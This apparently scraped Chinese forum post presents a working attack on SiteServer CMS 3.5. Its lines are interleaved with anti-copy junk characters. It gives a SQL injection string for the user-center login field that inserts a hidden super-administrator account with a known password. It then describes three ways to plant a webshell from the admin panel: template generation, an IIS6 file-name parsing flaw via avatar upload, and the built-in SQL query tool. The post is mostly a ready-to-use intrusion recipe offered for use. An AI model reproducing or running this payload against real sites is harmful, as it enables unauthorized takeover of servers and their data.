经测试秒杀最新的3.5版
& {; a$ m1 y m8 f
8 ?# }4 n* k, q( ]; Estieserver官网:www.siteserver.cn: x" [9 @8 a% @) @# ?
) { p7 W$ _3 e% N7 o- g9 R
' q: ?5 N+ z; V
9 A& n- W3 a8 bEXP:3 {/ f9 ^6 o2 k5 s3 x2 o% Q1 }& V
) ?$ H4 n9 E7 {! E- [) K! D/ A直接访问UserCenter/login.aspx; R6 }+ r1 ]( I8 ^0 q
; n& I/ _7 { N0 j) n! W
8 M# n6 @4 ?( S( d6 m7 J3 y/ S9 N. ?' t# k& ~( I
用户名处输入:
( ?$ d3 _0 B6 z+ \7 v6 L& M
6 M5 R# r/ E; ]0 w123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
: f3 G0 }. t6 u/ t# T Y! x6 O7 i! r$ ?! d. V7 o) r6 }
* d5 e7 Z% [& I. S, B+ y0 ^6 y: y
/ `$ t1 l" ?6 D7 c$ L$ i密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
, _+ C/ J2 {8 o# y# w. X' r9 L4 \$ s9 P
7 x+ E: B9 |8 {/ V- x6 [5 _ `3 K8 S0 q5 \6 q
之后再访问后台SiteServer/login.aspx用插入的用户登陆
, M ]) D, i6 O# u+ H9 Y% @' b5 F! J% J
3 I3 z/ g3 j' E+ E$ j0 [8 i& D* u+ |& M* {8 R
后台拿webshell的三种方法:
. I) n$ j( L: N6 ~- F
$ D& j' e; Q/ Y- a$ [一、: X% l6 ]3 U8 S& d, q; H
& g; B/ [5 p3 S: P
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx& m! s; t% `) l; c+ t! t) V* ?
# ]) e( B3 x# U4 R二、
. ]2 P3 J8 s5 Y7 |8 {- h/ V5 A! K$ K* v/ b2 p4 G4 _
成员权限-》添加用户-》用户名为:1.asp/ {0 r( l% k7 ?9 L7 S+ A1 V$ @
5 z, _% g2 z4 K" @8 I- J5 O- E& @http://127.0.0.1/usercenter/
" D# R1 j4 m2 G+ u; j/ y; O& Y% G7 c, v' n; d1 S
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
3 i5 \3 L4 Q& t9 y0 z6 J/ q# P( E8 h3 X
(ps:后台添加用户时不会验证是否含有非法字符)
0 o6 \5 U+ _8 t( r5 d3 P3 |/ }6 u% v* J/ h% D6 \: f( c& b$ X
三、 a' r, t# R1 X5 W0 j' P/ F
1 Y3 @, {( S/ {# M! T7 t系统工具-》实用工具-》机器参数查看 v3 K. m' S# m( M" {; w( F9 {
可以看到数据库类型、名称,WEB路径
" t7 p. \9 [4 B: T- W1 ~9 L7 j* \0 z0 U, | Q0 ?
系统工具-》数据库工具-》SQL语句查询
S- G& D( W7 `0 K4 W3 n6 q' A这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
# B* Q7 R3 N* I1 \ f
4 m v* i$ e- p. g3 f |